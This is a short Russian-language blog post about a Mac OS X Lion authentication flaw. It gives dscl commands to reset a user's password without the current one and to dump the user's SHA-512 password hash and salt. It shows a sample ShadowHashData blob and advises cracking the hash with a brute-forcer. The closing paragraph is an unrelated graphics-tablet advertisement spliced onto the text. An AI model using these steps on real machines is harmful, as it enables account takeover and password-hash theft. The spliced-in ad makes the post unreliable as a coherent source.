Извлечение и взлом хэша пароля в Lion
На днях наткнулся на запись в одном американском блоге по безопасности об изъяне в переработанной системе механизма аутентификации и служб каталогов в Lion. Короче, можно изменить пароль текущего пользователя просто прописав команду в теминале и он даже не запросит у вас текущий пароль пользователя.
$ dscl localhost -passwd /Search/Users/<username>
В Mac OS Lion также легко сбросить SHA-512 хэш пароля пользователя с помощью следующей команды:$ dscl localhost -read /Search/Users/<username>
Затем найдите dsAttrTypeNative:ShadowHashData в выходной последовательности (пример ниже). Хэш пароля выделен зеленым, а красным соль:62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060
Для взлома хэша пароля используйте любой брутфорсер. Однако, восстановление пароля из хэша весьма не легкая задача.Надеюсь в следующем минорном обновлении Apple закроют эти уязвимости.
Если вы профессиональный художник или просто любите рисовать в Photoshop, лучшим приобретением для вас станет графический планшет. Он раскроет весь ваш потенциал! Вы можете купить графический планшет в компьютерном магазине или в Интернет-магазине.
